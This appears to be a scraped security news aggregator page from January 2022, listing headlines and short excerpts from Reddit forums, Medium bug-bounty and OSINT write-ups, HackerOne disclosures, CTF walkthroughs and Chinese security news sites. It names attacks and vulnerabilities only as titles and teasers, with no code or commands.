    Over the years, changes in the threat landscape have made attribution more difficult. Attribution has always been challenging, but has been and can continue to be eased through visibility. That is, if your view into an event or campaign is limited to resources such as malware samples pulled from public repositories, then attribution can be challenging. Even adding information regarding infrastructure extracted from the sample configs can still give a somewhat limited view. However, as visibility is expanded to include data from intrusions and incidents, attribution becomes clearer and more granular. I ran across A Complex Threat Landscape Muddles Attribution recently and found it to be a fascinating, insightful read, one that anyone involved in threat intelligence, even peripherally, shoul…  ( 8 min )
  • Open

    Wildfire videos - wireless research UCSD
    The High Performance Wireless Research and Education Network (HPWREN), a University of California San Diego partnership project led by the San Diego Supercomputer Center and the Scripps Institution of Oceanography's Institute of Geophysics and Planetary Physics, supports Internet-data applications in the research, education, and public safety realms. HPWREN functions as a collaborative, Internet-connected cyberinfrastructure. The project supports a high-bandwidth wireless backbone and access data network in San Diego, Riverside, and Imperial counties in areas that are typically not well-served by other technologies to reach the Internet. This includes backbone locations, typically sited on mountain tops, to connect often hard-to-reach areas in the remote Southern California back country. http://hpwren.ucsd.edu/HWB/ submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    Indiana Department of Homeland Security Fire Regulation Variance Requests
    submitted by /u/Typographical_Terror [link] [comments]  ( 1 min )
    Books on Theorists of Education [PT-BR]
    submitted by /u/afmachado [link] [comments]
  • Open

    Tracing Tor router connections within a host
    Hi there, I'm analysing a memory dump from an infected system that is running a cryptominer and connecting to the mining server through a Tor router. I know the processes of the miner and the tor router it installed on the system. Is there a way to show the miner handing over the IP of the actual mininf server to the Tor router? The firewall of course just sees the connection to the next Tor router. submitted by /u/NazgulNr5 [link] [comments]  ( 1 min )
    What are some jobs that you can do with experience in computer forensics?
    I have a very close friend who has been doing computer forensics for well over 10 years and has experience with networking technology too. They've been working for local law enforcement all this time and has had to deal with "very bad sexual content" for quite a long time and it's really starting to eat away at their mental health. They really would like a job change. They are willing to work in law enforcement as long as the work doesn't involve kids. They make good money at the police department they work at now so a part of the equation is a paycheck. They are hoping to work at this job for the rest of their career. Teaching would also be an option. Thanks for any answers. submitted by /u/Onece_in_a_life_time [link] [comments]  ( 3 min )
  • Open

    Process Ghosting Attack
    Introduction Gabriel Landau released a post on Elastic Security here which talks about a technique through which antivirus evasion was found to be possible. The The post Process Ghosting Attack appeared first on Hacking Articles.  ( 8 min )
    Corrosion: 2 VulnHub Walkthrough
    Proxy Programmer’s Corrosion: 2 is a Vulnhub medium machine. We can download the lab from here. This lab is designed for experienced CTF players who The post Corrosion: 2 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )
    Intelligence HacktheBox Walkthrough
    Introduction Intelligence is a CTF Windows box with difficulty rated as “medium” on the HackTheBox platform. The machine covers OSINT, AD attacks, and silver ticket The post Intelligence HacktheBox Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    Process Ghosting Attack
    Introduction Gabriel Landau released a post on Elastic Security here which talks about a technique through which antivirus evasion was found to be possible. The The post Process Ghosting Attack appeared first on Hacking Articles.  ( 8 min )
    Corrosion: 2 VulnHub Walkthrough
    Proxy Programmer’s Corrosion: 2 is a Vulnhub medium machine. We can download the lab from here. This lab is designed for experienced CTF players who The post Corrosion: 2 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )
    Intelligence HacktheBox Walkthrough
    Introduction Intelligence is a CTF Windows box with difficulty rated as “medium” on the HackTheBox platform. The machine covers OSINT, AD attacks, and silver ticket The post Intelligence HacktheBox Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    My Pentest Log -4-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
    Creating easy proof-of-concept scripts with Python and Curl.
    Hello Hunters! Continue reading on Medium »  ( 3 min )
    PORTSWIGGER WEB SECURITY - XSS (CROSS SITE SCRIPTING) LAB ÇÖZÜMLERİ
    Cross Site Scripting (Siteler Arası Komut Dosyası Çalıştırma), saldırganın bir web uygulamasında çalıştırdığı zararlı komutlar sonucunda… Continue reading on Medium »  ( 32 min )
    Fuzzing is always fun..!!
    Hello Everyone, Continue reading on Medium »  ( 2 min )
    Setting up a Free VPS for Bug Bounty & More
    Finding Bugs can be Time consuming and as for day-to-day life, you are not sitting on your one computer all day unless you are a… Continue reading on Medium »  ( 3 min )
    How I was able to find multiple vulnerabilities of a Symfony Web Framework web application
    Found high severity vulnerability just from reconnaissance. Found multiple vulnerabilities on a web application that used the Symfony web… Continue reading on Medium »  ( 2 min )
  • Open

    Show HN: TypeScript Scenario-Based Web Application Fuzzing Framework
    Article URL: https://github.com/shfz/shfz Comments URL: https://news.ycombinator.com/item?id=30047196 Points: 1 # Comments: 0  ( 4 min )
  • Open

    SecWiki News 2022-01-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    你家的wifi安全么?
    你家的Wifi安全么,有没有可能被别人蹭网,或者被黑客登录进来,窃取数据?  ( 1 min )
    域内常用的操作精简版
    当我们渗透进了内网当中,我们需要快速确定我们自身所处的环境,以及我们需要确定接下来该如何行动。这篇文章非常精简的介绍了这些操作  ( 1 min )
  • Open

    Intigriti’s January XSS challenge By TheRealBrenu
    First challenge for 2022 is here by TheRealBrenu. This one is a good example of javascript source maps, which I was unfamiliar at first… Continue reading on Medium »  ( 3 min )
  • Open

    OSINT Double Trouble
    It’s a new year, and that means new OSINT Challenges to solve. This time around, I’ll be solving 2 challenges courtesy of Twitter’s… Continue reading on Medium »  ( 4 min )
  • Open

    Cracking Kubernetes Network Policy
    TL; DR This post digs into the Kubernetes NetworkPolicy model, then designs a policy enforcer based on the technical requirements and further implements it with less than 100 lines of eBPF code. Hope that after reading through this post, readers will get a deeper understanding on how network policies are enforced in the underlying. Code and scripts in this post: here. TL; DR 1 Introduction 1.1 Access control (NetworkPolicy) in Kubernetes 1.2 How policies could be enforced in the underlying? 1.3 Purpose of this post 2 Design a dataplane policy enforcer 2.1 Introducing service identity 2.2 Introducing identity store: Labels Identity 2.3 Introducing policy cache 2.4 Introducing IPCache: PodIP -> Identity 2.5 Hooking and parsing traffic 2.6 Compose up: an end-to-end workflow 3 Imp…

  • Open

    I'm working in security and stuck on whether I should learn Web Development
    Hi Everyone, I currently work in Cyber security (Cryptography specialist) for a large organization. However, I have minimal coding experience. I would like to start the Odin Project but I'm not sure if I should invest all that time in learning web dev or continuing a path in security with something like a CISSP for more security knowledge. The odin project inspired me because I want to create custom blogs/websites of my own at some point but I do know it might halt my security knowledge progression and I know I can't balance learning both right now. Will having both skills be better than just having one? If anyone has another suggestion that would be better I am open to that as well. The odin project inspired me because I want to create custom blogs/websites of my own at some point but I do know I have a lot to learn in either path I choose. Thank you in advance. submitted by /u/Early_Ad_1861 [link] [comments]  ( 3 min )
    Backdoor payloads in image files: is this a thing?
    If I open an image in gmail (I think it opens through their viewer), can the payload run? Should I be concerned? Is just viewing it sufficient or would I have to download it? submitted by /u/anon314159265358p [link] [comments]  ( 1 min )
    Does anyone know what these photos/files are from the Brave browser folder?
    There were also some manifest.json's that had information like ""name":"Brave NTP sponsored images"", "Brave NTP sponsored images", "Tezos", "Taxbit" in them. Are these preloaded files for ads for a cryptocurrency/NFT manager that's placed somewhere in Brave intentionally? They were listed in a folder that looked like gibberish: "ghjifhoinncdowgrhioybqpasjndavbaoba" as an example. https://imgur.com/a/zozye1B I don't have to worry about some kind of "secret" cryptominer like Norton recently added to their software right? (I hope that this is the case and it's just files for ads). submitted by /u/nekohideyoshi [link] [comments]  ( 1 min )
    ISO 27001 Lead Auditor Certification
    Hey everyone. So I’m planning on doing the ISO 27001 LA certificate and came across it being offered by multiple certification body such as TUV, BSI and PECB. Can anyone tell me what the difference is between the certification bodies as I see a drastic price difference. Thanks in advance. submitted by /u/reeds1164 [link] [comments]  ( 1 min )
    What is the best entry level Linux certification?
    Hey everyone! Thank you for stopping by my post. I was wondering what is the best entry level Linux certification. I understand that the Linux + and Lpic-1 are no longer are a 1 for 2 package. Then everything I read online says don’t go for either of these and look into getting a red hat certification. I am going down the security engineer road and just need to get much deeper into Linux than I currently am. What are your recommendations and thoughts on Linux certifications? submitted by /u/RedNeckHutch [link] [comments]  ( 3 min )
    What can work computers/IT have access to?
    Assume you have a work laptop given to you with a remote software that’s installed to give IT monitoring and troubleshooting access. What are some best practices for separating your work and personal stuff when using the work laptop? Should you avoid logging into things like your personal google account, Bank accounts, etc? Does this make it possible for someone in IT possibly with bad intent to also have access to your other devices in your network? If so, best practices to avoid such breaches? I assume you never want to login into your other computers shared drives from your work computer which will give access to every file on your personal computer that’s shared. I’m curious what is the extent of monitoring that a normal corporate workplace does on the computer? I always assumed they can see my screen at any time, all key strokes are logged. But this makes me uncomfortable in the event that there’s a breach, hack, or bad employee who can cause lots of damage. Thoughts on this matter? Anyone familiar with kaseya software for monitoring? submitted by /u/RasAlTimmeh [link] [comments]  ( 1 min )
  • Open

    Beginner Bug Bounty Guide - Part 2
    Previous: Beginner Bug Bounty Guide - Part 1 Continue reading on Medium »  ( 1 min )
    Bug Fix Update: TribeOne dApp is Ready to Take NFT Space by Storm
    Our dApp is getting closer and closer to perfection as we work hard to achieve the best possible user experience. Continue reading on Medium »  ( 2 min )
    Kenobi Walkthrough | TryHackMe | Explained | Part 1
    Goals: Enumerate Samba for shares, manipulate a vulnerable version of proftpd Continue reading on Medium »  ( 3 min )
    Malicious file upload leads to off-domain XSS
    Hello Everyone, Continue reading on Medium »  ( 1 min )
    Demystifying JA3: One Handshake at a Time
    Recently, I was browsing a website with BurpSuite and found out that the website was blocking my requests. In the pursuit of unlocking the… Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    GoWard - A robust Red Team proxy written in Go
    submitted by /u/UnwearableCactus [link] [comments]
    CVE-2021-45467: CWP CentOS Web Panel – preauth RCE
    submitted by /u/Gallus [link] [comments]
  • Open

    Case in modern communist destabilization of Ukrainian-Poland relations
    Case provides overview of 5 year long activity of former Ukrainian citizen in Poland, conducting provocations and communist propaganda in… Continue reading on Medium »  ( 13 min )
    Quiztime — Random OSINT Challenge 5
    On Jan 14, 2022, Quiztime (contributor @dondude) shared a new OSINT quiz with us. The objective was fairly simple. We had to figure out… Continue reading on Medium »  ( 3 min )
    OSINT Challenge — On the road to Estonia
    In December 2021 the OSINT Dojo invited the community to solve a traditional image-based geolocation OSINT challenge. They have asked for… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-01-22 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-22 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Buffer Overflow in optimized_escape_html method
    Internet Bug Bounty disclosed a bug submitted by chamal: https://hackerone.com/reports/1455248 - Bounty: $1200
    xss reflected on imgur.com
    Imgur disclosed a bug submitted by whoami991: https://hackerone.com/reports/1058427 - Bounty: $100
  • Open

    Android Pentesting-Intents
    When doing a black box pentesting for android , apart for looking at root detection bypass and ssl pinning looking for intents are also… Continue reading on Medium »  ( 2 min )
  • Open

    A collection of 8mm family videos from the 60's that have been digitized and restored
    submitted by /u/HGMIV926 [link] [comments]  ( 3 min )
  • Open

    OSS authors:“We need to understand your mitigation plans for this vulnerability”
    Article URL: https://twitter.com/bagder/status/1484672924036616195 Comments URL: https://news.ycombinator.com/item?id=30035651 Points: 68 # Comments: 11  ( 1 min )
    CVE-2022-0185: Detecting Linux Kernel vulnerability causing container escape
    Article URL: https://sysdig.com/blog/cve-2022-0185-container-escape/ Comments URL: https://news.ycombinator.com/item?id=30034914 Points: 18 # Comments: 0  ( 5 min )
  • Open

    CVE-2021-45467: CWP CentOS Web Panel – Preauth RCE
    Article URL: https://octagon.net/blog/2022/01/22/cve-2021-45467-cwp-centos-web-panel-preauth-rce/ Comments URL: https://news.ycombinator.com/item?id=30035247 Points: 1 # Comments: 0  ( 3 min )
    CVE-2022-0185: Detecting Linux Kernel vulnerability causing container escape
    Article URL: https://sysdig.com/blog/cve-2022-0185-container-escape/ Comments URL: https://news.ycombinator.com/item?id=30034914 Points: 18 # Comments: 0  ( 5 min )
  • Open

    Demystifying JA3: One Handshake at a Time
    Recently, I was browsing a website with BurpSuite and found out that the website was blocking my requests. In the pursuit of unlocking the…  ( 6 min )
  • Open

    Demystifying JA3: One Handshake at a Time
    Recently, I was browsing a website with BurpSuite and found out that the website was blocking my requests. In the pursuit of unlocking the…  ( 6 min )
  • Open

    Demystifying JA3: One Handshake at a Time
    Recently, I was browsing a website with BurpSuite and found out that the website was blocking my requests. In the pursuit of unlocking the…  ( 6 min )
  • Open

    Employee Access to Data
    This is largely for those who work in, have worked in, or have worked with a SOC. For this example, there is a SOC that has tiers of analysts, with lower level analysts performing basic tasks and escalating alerts to the upper level analysts. The lower level analysts serve more of a traffic cop type of role; they weed out the easily spotted false-positives and may start very basic reviews of true positive events before handing off to the higher level analysts for analysis. In this setup, all members of the SOC have full access to M365 (all mailboxes, all OneDrives). This is in addition to the ability to triage machines via an EDR tool and collect files through that tool. My question: is that type of access appropriate for the lower level analysts? The obvious concern is that it is excessive data for the role they are performing (including any especially since the position has fairly high turnover. What are your thoughts? submitted by /u/ebarboza311 [link] [comments]  ( 2 min )
    digital forensics software bypass encryption
    How does forenics software extract files from password protected iphones? submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
    Old iphone se
    I have an old iphone se i rhink. Somebody tried logging in buch of times and locked out forever basically. So i connected to itunes and it told me to update it so i did just in case it gives me a chance to try again and now it says phone unavailable. And not lock screen. So am i screwed because its extremely important to get the videos and photos from there. submitted by /u/TushieandTush [link] [comments]  ( 1 min )

  • Open

    CVE-2022-0185: Detecting and mitigating Linux Kernel vulnerability causing container escape
    submitted by /u/MiguelHzBz [link] [comments]
    The best free, open-source supply-chain security tool? The lockfile
    submitted by /u/pabloest [link] [comments]  ( 1 min )
    Captain Hook - How (not) to look for vulnerabilities in Java applications
    submitted by /u/Gallus [link] [comments]
  • Open

    I need an advice
    Hi, I can choose among 3 internships as a computer science student. I really want to land a job in cybersecurity but right now I need to build up my CV and finish my degree. The 3 internships are: Automation Software Engineer (you have to validate portions of software implementations for Communication Service Providers based on established engineering principles and in accordance with provided specifications and requirements, help evolving our telecommunication focused product, build demonstrations of product use cases help to prepare collaterals to explain technical product capabilities, software architectures and features, build automated test scripts to analyse test data to verify requirements compliance) Internship Program for Information Science or Telco Engineer (you have to participate to a project delivery for assigned tasks, that may include performing analysis and design of a IT or Telco Solution, SW Development, systems configurations, troubleshooting systems errors/problems, monitoring and/or testing systems performance, and contribute to the design of technical solutions for customer environments, work under supervision of technical lead and with customer nominated representatives to accomplish assigned tasks) Automated Assurance Artificial Intelligence & Machine Learning Engineer (validate portions of software implementations for Communication Service Providers based on established engineering principles and in accordance with provided specifications and requirements, develop and extend the coverage of current test automation, build automated test scripts to analyse test data to verify requirements compliance, work on small independent software and system integration projects to augment internal work). As you can see they are intertwined, but I would guess the 2nd one could be more cybersec-oriented (for the telco part). What do you think? Any advice is appreciated. submitted by /u/Danyderossi [link] [comments]  ( 2 min )
    Switching From IT Audit
    Hello, I work in IT audit and I would like to have a more operational/hands-on role within an IT department. The problem is that I don't have any experience dealing directly with IT work. How would you recommend I go about transitioning from IT audit to a more technical role? Any certifications or skillsets I you would recommend I obtain? I was thinking IT Security would probably be the best fit, given most of my audits are involved with IT security, patch management, or mobile device security. submitted by /u/DapperDandy22 [link] [comments]  ( 1 min )
    Payloads in Word/PDF documents: Is this still a thing?
    I read about this being used to hack computers recently. Are most computers still vulnerable to this? Payload=malicious file that could potentially create a backdoor that runs in the document when you enable macros (most people are not cognizant of this possibility). An article I read tested this successfully on a Windows machine running Outlook that defaulted to Adobe to read the PDF. I noticed in GMail that docs and PDFs aren't opened on the computer, but read in a window. Does this prevent payload execution? Anyways, I'd like to know if this is still a thing and why? Why can't Adobe or Microsoft build their applications to not allow this? submitted by /u/anon314159265358p [link] [comments]  ( 3 min )
    Red team Operator to security strategy consultant
    Hi all, I am currently working for a big four firm(US) as a red team member. I am thinking to switch to the broader sense of security to see more parts such as security stragegy/security officer/architect roles Many people see red teaming as the most fun job & I agree it is awesome. However, Red team is only smart part of the equation. Who has made the leap and switched to a strategy role as a pentester/red team? What was your experience in the new role? submitted by /u/TechnicalCiso [link] [comments]  ( 2 min )
    Taking on new role as Security Architect. Advice? Tips? Considerations? Anything welcome!
    As the title states, taking on a new role as a Security Architect for a predominantly Windows hybrid cloud/on-prem environment that hosts quite a few web servers. I am very comfortable with the deployment and configuration of hardened endpoints, SIEMs (Splunk & ELK), network segregation, backup and restoration, and authoring most relevant policy and procedure as it relates to NIST 800-53. My understanding is that I am one of 2 "cybersecurity" specialists and will be responsible for documenting, developing, and configuring the entire security architecture from the ground up. I've been told that MFA has been enforced at 100% compliance. I am not however familiar with securing a hybrid environment, and don't have a ton of experience managing firewalls. How should I approach the discovery/recon aspect of becoming familiar with a new network? After getting my bearings and a detailed depiction of the current architecture, I plan to first tackle the backup and restoration processes to ensure ransomware resistance. Then address any glaring weak points. Anything to help a brother out? submitted by /u/UnderZinfluence [link] [comments]  ( 4 min )
    likelyhood of embedding malicous code in music streaming services?
    to the Red Teamers: imagine this, i use a music streaming service, i have som playlists that me and my friends colloaborate on, this playlist have enabled "automatic download" so whenever a track is added it is also automaticly downloaded to my device. now take this further, you embed malicious code to tracks, and upload them to the music service, and then my friend add this track with malicious code to the playlist, and bam! i got the file on my systems. now add the fact that when you open af playlist to collaboration, it opens this playlist for everyone to add tracks. sure to hack the major providers of this service is going to be hard, but the small band/label/producer that uploads the tracks to the service, classic supply chain. and the bad actor can just browse around for open playlists and add these "bad" tracks and now you got the file to the device. so to what degree is this a like attack vector? is it at all feasable? because you got plenty versions for different OS with likely exploits available. i atleast was quite surprised to find a playlist of mine, with alot of new music i didnt recognize for a user i had not shared my playlist with. and was sitting at work and thought, "this is most likly an overlooked tool to use" so should one be worried about these "auto sync/download" a bit like dropbox, but here it is open to everyone/the world. atleast i block the unsanctioned cloud storage services, while permitting the web part at work, so when you download stuff via web its scanned and checked by our EDR, where i worry about the app's with auto sync and all that. so should i block spotify, tidal, soundcloud [insert service here] apps aswell? submitted by /u/Uli-Kunkel [link] [comments]  ( 3 min )
    Startup Asking for SSN in a Google Form
    I worked for a small startup during the summer of 2021. There were several things that came up during the internship that made me feel the company was not one that I would stand behind, and they didn't know what they were doing. They paid me hourly, but they never set up an employment contract that they promised. They never collected my tax info. Suddenly, within the last two days they have sent me several messages asking me to fill out a Google Form so they can complete the 1099's. The form is just straight up all the most sensitive information: full legal name, address, email & phone, SSN. (1) I'm not sure how secure it would be to send an SSN over a Google form, so I haven't done it yet. (2) I know that the form will result in a Google sheets that has all of the employees info, and I'm not sure if the company will keep that secure or delete it, but it weirds me out thinking that there might indefinitely be a Google form out there with my SNN other personal info, and they'll forget about it when the company inevitably goes defunct. (3) I'm not sure what other secure method I can suggest, to get them this information so they can send the 1099. submitted by /u/ImpressiveAirport4 [link] [comments]  ( 2 min )
    Anyone surprised about the lack of fundamental knowledge in network security? Not enough forward engineering knowledge it seems.
    There seems to be a surprising lack of fundamental knowledge in network security. Has anyone else felt the same? Here are some examples working with different teams: Work heavily with Kibana servers, but lacked fundamental database knowledge You would think someone managing a clusters would at least understand the basics of distributed systems Heavily use SIEMs, but could not tell you what a the concept of an operating system process beyond "Yeah, it's a program that executes." A serious lack of web development knowledge A lot of people entering the field claiming they are knowledgeable in network security, but can't forward engineer a basic CRUD app, and yet they'll claim they know how to reverse engineer it and secure it. Yeah, you're able to successfully complete a basic SQL injection hackthebox, but you could barely construct a SQL query yourself. You just blindly put in a SQL query and hope you get back an error saying the web application is vulnerable and then blindly put in another SQL query. submitted by /u/me_hungry_and_sad [link] [comments]  ( 4 min )
  • Open

    Cyber Investigator OSINT CTF “Cyber Crime” Writeup
    The Cyber Society at Cardiff University runs the Cyber Investigator CTF, a free CTF with OSINT and forensics challenges. Continue reading on Medium »  ( 4 min )
    First Blog…
    This is my first ever blog. Blogging is not something I ever thought i’d end up doing, but to obtain #OSINTDojo ranks & badges there are… Continue reading on Medium »  ( 6 min )
    Срочно! Поляки угрожают известному журналисту Игорю Исаеву!
    Известному запорожскому журналисту Игорю Исаеву в Польше грозят 3 годами тюрьмы. Кто это сделал? Continue reading on Medium »  ( 10 min )
    Windows Shell — Discovery Stage
    Sometimes you don’t always need a Meterpreter shell. Depending on the intent, Netcat might be all you need. The benefit being that Windows… Continue reading on Medium »  ( 5 min )
    Using Open Source Intelligence (OSINT)
    Recently, Netflix’s ‘The Great Hack’ has sparked a lot of interest around data privacy. The documentary covers Cambridge Analytica and how… Continue reading on Medium »  ( 7 min )
  • Open

    hosted.weblate.org display of unfiltered results
    Weblate disclosed a bug submitted by joshmcman08: https://hackerone.com/reports/1454552
    Email change or personal data change on the account.
    Stripe disclosed a bug submitted by dk82hg: https://hackerone.com/reports/1250037 - Bounty: $3000
    [https://app.recordedfuture.com] - Reflected XSS via username parameter
    Recorded Future disclosed a bug submitted by bombon: https://hackerone.com/reports/1201134 - Bounty: $300
    disclosing clients' secret keys https://stage-uapi.tochka.com:2000/
    QIWI disclosed a bug submitted by rivalsec: https://hackerone.com/reports/1419205 - Bounty: $150
  • Open

    Duplicating USB drives
    Good day all, I feel my question is on the border of Computer forensics, but I believe still pertinent. I do not come from a background in IT, and have been figuring this all out on my own in the past few years. I have acquired a set (x3) of USB drives to collect images and videos from clients phones in an easier way. I have added the exact nomenclature of what I have below. I need this to be done in a forensically sound manner, and I am currently going through the steps to validate my theory these collect data in a forensically sound manner. To be forensically sound any media should be "zeroed" or wiped prior to use. Herein lies my question. With these flash drives they obviously have some sort of proprietary software which makes them work. If I were to format these I would lose this proprietary software. What would be a way I could format these drives and then return them to "manufacturer settings"? ​ I have looked into USB duplicators, not sure if this could be a forensically sound option. Also, they seem too expensive to acquire for my organization currently. ​ USB in question: MFi Certified 128GB Photo-Stick for iPhone-USB-Flash-Drives External Storage Stick for USB C iPhone-Thumb-Drive Memory-Mobile-for-Android-Phones iPad-Flash-Drive Photo Transfer Stick submitted by /u/Unfair-Border8865 [link] [comments]  ( 3 min )
    Unexplained WAN traffic to private subnet ranges
    While investigating a remote intrusion warning I noticed http traffic from two separate devices communicating with private IP subnet ranges that do not belong to any of our routers, or other devices. All of the traffic are to port 80. Example IPs include: 10.50.60.15 10.80.80.112 209.54.181.102 All the above are reserved private ranges and the aforementioned traffic was observed on two different routers, but using the same Verizon modem. Anyone seen this before, or can explain? There are no VPNs in use, or similar service. Log submitted by /u/keeny-fn-pawers [link] [comments]  ( 1 min )
    SQLite query repository?
    Does anyone know of any repositories (sites, blogs, etc) where people can post and look for SQLite queries? There are times when the best tools in the world can’t parse what you want and I thought it would be a great resource if there were queries others had done and shared cataloged somewhere. If you know of any, or any good sites, drop them below! submitted by /u/acw750 [link] [comments]  ( 1 min )
    Forensic script ideas?
    Hello all, I have no programming experience, I can use command line and get around in Linux but I would like to make practical things the community would find useful. There are so many good scripts and tools out there but what is a missing tool that you would like to have? I would like to build the script/program in Python, Go or C#. I am looking for some ideas that you think a beginner would be able to tackle that would have some value to others. submitted by /u/AgitatedSecurity [link] [comments]  ( 2 min )
  • Open

    SecWiki News 2022-01-21 Review
    自动化渗透-DeepExploit框架深度分析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-21 Review
    自动化渗透-DeepExploit框架深度分析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Simple CTF- TryHackme
    CTF Continue reading on System Weakness »  ( 2 min )
    Hashing the Favicon.ico
    Hey Folks, I am Ski Mask and I recently started bug bounty. in this Write-up, I will tell you about one of my findings!! Continue reading on Medium »  ( 1 min )
    Multi XSS Exploit in Upload File
    Hello amazing hunters, Today i want to notice 4 ways to find xss in file upload that i found all of them in bug bounty programs or pentest… Continue reading on System Weakness »  ( 2 min )
    Cronos Theft of Transactions Fees Bugfix Postmortem
    Transactions in blockchain are like sound traveling through air. We communicate with others through transactions; we announce what we’re… Continue reading on Immunefi »  ( 4 min )
    Nakji Network launches a 200K USD Bug Bounty Program
    Singapore, 21st January 2022 — The Nakji Foundation (‘Nakji’) is launching a 200K USD Bug Bounty program for developers and security… Continue reading on Sentinel Protocol »  ( 3 min )
    Top 10 web hacking techniques of 2021 — PortSwigger
    OK , mình sẽ từ từ dịch hết tất cả các method , các bạn có thể có thể xem bản gốc ở đây : “‘Top 10 web hacking techniques of 2021 —… Continue reading on Medium »  ( 1 min )
  • Open

    关于漏洞检测适用命令的思考
    通常会遇到需要发包,去观察返回结果。通过返回结果去判断命令是否执行。那么那种命令执行的效果最佳?  ( 1 min )
    FreeBuf早报 | 印尼央行遭勒索攻击13GB数据外泄;推特安全团队大动荡前高管离职
    推特安全部门的负责人皮特·扎特科已离开公司,他曾是安全领域的著名黑客“Mudge”。首席信息安全官林基·塞西将在未来几周内离职。  ( 1 min )
    Cisco StarOS漏洞或有远程代码执行和信息泄露风险
    日前,思科公司(Cisco)宣布修补了一项远程代码执行漏洞。
    FreeBuf 甲方私享会·上海金融之夜活动圆满举行
    1 月 15 日下午,由中国网络安全行业门户 FreeBuf 发起的首场「甲方私享会·上海金融之夜」活动在上海顺利举行。
    FreeBuf周报 | 知名字幕站 Opensubtitles 遭黑客入侵;中国首个网络安全行业服务短号开通
    我们总结推荐本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!  ( 1 min )
    ASRC 2021年电子邮件安全趋势回顾
    后疫情时代,大家也都慢慢开始适应远程办公,信息安全设备的部署不再只是慌乱应对远程工作所带来的安全隐患,而是全新型态的适应性部署  ( 1 min )
    2021年针对性勒索攻击活动年度报告
    索软件攻击已经是网络安全的最大威胁之一,已从早期网络滋扰发展成为如今危害社会运作、经济稳定和公共安全并不断升级的全球新挑战。  ( 1 min )
    盖棺事已:REvil勒索组织落网
    14日俄罗斯当局公布对勒索组织REvil实施抓捕  ( 1 min )
    2021网安法规大盘点:重磅法规持续落地,数据安全迎新机遇
    总的来说,2021年是数字经济腾飞之年,也是网络安全全面深入发展之年,更是数据领域全面深入监管之年。  ( 1 min )
    Freebuf甲方群话题讨论 | 聊聊企业假期网络安全
    春节将至,对于企业安全而言是一次不小的考验,作为年前最后一期话题讨论,想让大家聊聊如何保障假日期间企业的网络安全。  ( 1 min )
    2021 SCTF Flying-kernel题目分析
    这道题可以通过多种方式提权获得flag。这篇文章的解法更偏向于Glibc那套利用方式,内核任意地址写,并不是预期解,但是衍生出了更多的利用思路,有兴趣的可以自行调试。  ( 3 min )
    FreeBuf 网安大事记 | 2021年度漏洞利用事件汇总
    让我们回眸,盘点在2021年引发行业、乃至整个社会影响的30起漏洞利用事件。  ( 1 min )
    《信息安全技术 网络安全服务成本度量指南》(征求意见稿)发布
    《指南》适用于网络安全服务供需双方开展网络安全服务成本预算、项目招投标、项目决算以及相关合同编制等活动。
  • Open

    Lessons from the Log4j crisis: Are we ready for the next global vulnerability?
    Were you prepared for Log4Shell? These lessons learned will help your organization respond more efficiently to the next global vulnerability crisis. READ MORE  ( 3 min )
    What to know about Biden’s latest cybersecurity memorandum
    The Biden Administration’s new memorandum on National Security aims to improve security posture for intelligence and defense agencies. Here’s what you need to know. READ MORE  ( 2 min )
  • Open

    RedRabbit — Offensive PowerShell
    RedRabbit is the twin of BlueRabbit however, RedRabbit has more offensive scripts. RedRabbit was created to help conduct ethical… Continue reading on Medium »  ( 3 min )
  • Open

    A modern, elastic design for Burp Collaborator server
    When we launched Burp Collaborator back in 2015, PortSwigger deployed a public Collaborator server that anyone could use. This meant that OAST testing with Burp Collaborator was able to work straight  ( 4 min )
  • Open

    A modern, elastic design for Burp Collaborator server
    When we launched Burp Collaborator back in 2015, PortSwigger deployed a public Collaborator server that anyone could use. This meant that OAST testing with Burp Collaborator was able to work straight  ( 4 min )
  • Open

    Security vulnerability in Rust standard library
    Article URL: https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html Comments URL: https://news.ycombinator.com/item?id=30023615 Points: 64 # Comments: 37  ( 2 min )
    DNS Vulnerability, Configuration Errors That Can Cause DDoS
    Article URL: https://labs.ripe.net/author/giovane_moura/dns-vulnerability-configuration-errors-that-can-cause-ddos/ Comments URL: https://news.ycombinator.com/item?id=30021239 Points: 1 # Comments: 0  ( 7 min )
  • Open

    Tons of software to Try and Buy :-)
    https://soft.uclv.edu.cu/ submitted by /u/Appropriate-You-6065 [link] [comments]  ( 1 min )
  • Open

    Authz0 v1.1 Released 🎉
    Hi security engineers and hackers! Authz0 v1.1.0 has been released 🎉 First of all, I would like to thank many of you for your good feedback. Summary Add setCred command Add –include-zap flag in new command Add –include-har flag in new command Add –include-burp flag in new command Add –assert-fail-size-margin flag in new command Support multiple same assert type Improve report Fixed bugs Credentials and setCred Now, we can add credentials to the template using the setCred command.

  • Open

    Invalid handling of X509_verify_cert() internal errors in libssl (CVE-2021-4044)
    Internet Bug Bounty disclosed a bug submitted by tniessen: https://hackerone.com/reports/1455411 - Bounty: $1200
    Reflected XSS online-store-git.shopifycloud.com
    Shopify disclosed a bug submitted by bepresent: https://hackerone.com/reports/1410459 - Bounty: $3500
    Direct Access To admin Dashboard
    Shopify disclosed a bug submitted by mester_x: https://hackerone.com/reports/1421804 - Bounty: $500
    Stored XSS at https://linkpop.com
    Shopify disclosed a bug submitted by nagli: https://hackerone.com/reports/1441988 - Bounty: $1600
    Cross-site Scripting (XSS) - Stored on ads.tiktok.com in Text field
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1376961 - Bounty: $999
  • Open

